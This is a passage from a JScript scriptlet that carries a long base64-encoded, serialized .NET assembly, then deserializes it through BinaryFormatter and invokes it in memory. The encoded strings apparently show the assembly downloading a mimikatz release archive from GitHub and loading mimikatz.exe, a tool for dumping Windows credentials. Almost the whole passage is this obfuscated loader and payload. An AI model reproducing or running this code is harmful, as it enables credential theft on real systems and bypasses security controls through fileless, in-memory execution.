		"bFByb3RlY3QAaE1vZHVsZQBwcm9jTmFtZQBscFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUA"+
		"bHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVhdGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBk"+
		"d01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNz"+
		"aW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2Vydmlj"+
		"ZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0"+
		"dHJpYnV0ZQBuZXRrYXR6MwBJbnRQdHIAVG9JbnQ2NABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2Vy"+
		"dmljZXMARGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyLmRsbABNaWNyb3NvZnQuV2luMzIuU2Fm"+
		"ZUhhbmRsZXMAU2FmZUZpbGVIYW5kbGUARmlsZVN0cmVhbQBGaWxlQWNjZXNzAFN5c3RlbS5UZXh0"+
		"AEVuY29kaW5nAEdldEVuY29kaW5nAFN0cmVhbVdyaXRlcgBzZXRfQXV0b0ZsdXNoAENvbnNvbGUA"+
		"VGV4dFdyaXRlcgBTZXRPdXQAQnl0ZQBNZW1vcnlTdHJlYW0AV3JpdGUAUmVhZABUb0FycmF5AElE"+
		"aXNwb3NhYmxlAERpc3Bvc2UAU3lzdGVtLk5ldABXZWJDbGllbnQARG93bmxvYWREYXRhAFN5c3Rl"+
		"bS5JTy5Db21wcmVzc2lvbgBaaXBBcmNoaXZlAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2Rl"+
		"bABSZWFkT25seUNvbGxlY3Rpb25gMQBaaXBBcmNoaXZlRW50cnkAZ2V0X0VudHJpZXMAU3lzdGVt"+
		"LkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmF0b3JgMQBHZXRFbnVtZXJhdG9yAGdldF9DdXJy"+
		"ZW50AGdldF9GdWxsTmFtZQBTdHJpbmcAb3BfRXF1YWxpdHkAZ2V0X1NpemUAT3BlbgBTeXN0ZW0u"+
		"Q29sbGVjdGlvbnMASUVudW1lcmF0b3IATW92ZU5leHQARXhjZXB0aW9uAGdldF9Jbm5lckV4Y2Vw"+
		"dGlvbgBaZXJvAE1hcnNoYWwAQ29weQBUb0ludDMyAFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0"+
		"VHlwZUZyb21IYW5kbGUAUHRyVG9TdHJ1Y3R1cmUAU2l6ZU9mAFJlYWRJbnQxNgBSZWFkSW50MzIA"+
		"V3JpdGVJbnQzMgBSZWFkSW50NjQAV3JpdGVJbnQ2NABQdHJUb1N0cmluZ0Fuc2kAb3BfRXhwbGlj"+
		"aXQAQWRkAEZpbGVNb2RlAFNlZWtPcmlnaW4AU2VlawBSZWFkVUludDMyAEZpbGUAUmVhZEFsbEJ5"+
		"dGVzAFJlYWRCeXRlcwBHQ0hhbmRsZQBHQ0hhbmRsZVR5cGUAQWxsb2MAQWRkck9mUGlubmVkT2Jq"+
		"ZWN0AEZyZWUAU3RydWN0TGF5b3V0QXR0cmlidXRlAExheW91dEtpbmQARmllbGRPZmZzZXRBdHRy"+
		"aWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUARmxhZ3NBdHRyaWJ1dGUAa2Vy"+
		"bmVsMzIALmNjdG9yAFN5c3RlbS5TZWN1cml0eQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAAAA"+
		"D0MATwBOAE8AVQBUACQAAIC1aAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBn"+
		"AGUAbgB0AGkAbABrAGkAdwBpAC8AbQBpAG0AaQBrAGEAdAB6AC8AcgBlAGwAZQBhAHMAZQBzAC8A"+
		"ZABvAHcAbgBsAG8AYQBkAC8AMgAuADEALgAxAC0AMgAwADEANwAxADIAMgAwAC8AbQBpAG0AaQBr"+
		"AGEAdAB6AF8AdAByAHUAbgBrAC4AegBpAHAAASF4ADYANAAvAG0AaQBtAGkAawBhAHQAegAuAGUA"+
		"eABlAAAlVwBpAG4AMwAyAC8AbQBpAG0AaQBrAGEAdAB6AC4AZQB4AGUAAAEAAACHWWlLXF4cQYJP"+
		"ySMsgyENAAi3elxWGTTgiQIGCAS1AQAAAgYJBAAAAEAEAgAAAAQDAAAABQACGBgIAgYYAwAACAoA"+
		"BxgOCQkJCQkJAwAAAQMgAAEGAAEdBRIRBAABAQ4DBhEQAwYRIAMGERgDBhEcBAYdESQDBh0FBCAB"+
		"AQ4FIAEBHQUHEAEBHgASFQMgAAIEIAARIAQgABEYBCAAERwFIAAdESQEIAAdBQMoAAIEKAARIAQo"+
		"ABEYBCgAERwFKAAdESQEKAAdBQIGBwIGBQMGERQCBgsDBh0DAwYRLAMgAA4DKAAOBAAAAAAHAAQY"+
		"GAkJCQQAARgOBQACGBgOCQAGGBgJGBgJGAUAAgkYCQUgAQERHQQgAQEIAyAACgQgAQEKBAcCGBgF"+
		"IAIBGAIHIAIBEjEROQUAARI9CAcgAgESERI9BCABAQIFAAEBEkkLBwUYEjESNRI9EkEHIAMBHQUI"+
		"CAcgAwgdBQgICgcFHQUSUQgdBQIFIAEdBQ4FIAEBEhEIIAAVEmEBEmUGFRJhARJlCCAAFRJpARMA"+
		"BhUSaQESZQQgABMABQACAg4OBCAAEhEEIAASdQgABAEdBQgYCAMgAAgHAAESfRGAgQYAAhwYEn0F"+
		"AAEIEn0FAAIGGAgEAAEIGAUAAgEYCAQAAQoYBQACARgKBAABDhhCBzASWR0FHQUSERIREl0SZRJ1"+
		"EgwIGBgKGBE0CBgIGBE0GBgYBwcHCAoYGAgYCQgYCBgYDhgIGA4YGBUSaQESZQIHCSADAQ4RgIUR"+
		"OQQKAREQByACCgoRgIkDIAAJBAoBESAECgERGAQKAREcBAoBESQFAAEdBQ4JBwUSNRIVCQgCCQcF"+
		"ElESFQkIAgIeAAUgAR0FCAkAAhGAkRwRgJUDIAAYCwcEHQURgJEeAB4ABAcCBwIEBwERIAQHAREY"+
		"BAcBERwFBwEdESQEBwEdBQYgAQERgJ0GIAEBEYCpAh4IBSABAR0DAwcBDgQBAAAACAEACAAAAAAA"+
		"HgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAYCeLgGAhFN5c3RlbS5TZWN1cml0eS5QZXJt"+
		"aXNzaW9ucy5TZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUsIG1zY29ybGliLCBWZXJzaW9uPTQu"+
		"MC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORUB"+
		"VAIQU2tpcFZlcmlmaWNhdGlvbgEAAHRMAAAAAAAAAAAAAI5MAAAAIAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAACATAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAA"+
		"AAAAAAAAAAEAAAAAAEgAAABYYAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8A"+
		"TgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAA"+
		"AAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4A"+
		"cwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAA"+
		"AIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkA"+
		"bwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAw"+
		"AAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwA"+
		"bAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBp"+
		"AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwAbAAAAAAA"+
		"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
		"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AEAAAAwAAACgPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"+
		"DQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBM"+
		"b2FkKEJ5dGVbXSkIAAAACgsA";
		var entry_class = 'TestClass';

		try {
			setversion();
			var stm = base64ToStream(serialized_obj);
			var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
			var al = new ActiveXObject('System.Collections.ArrayList');
			var d = fmt.Deserialize_2(stm);
			al.Add(undefined);
			var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
			
		} catch (e) {
			debug(e.message);
		}

	}

]]>
</script>

</scriptlet>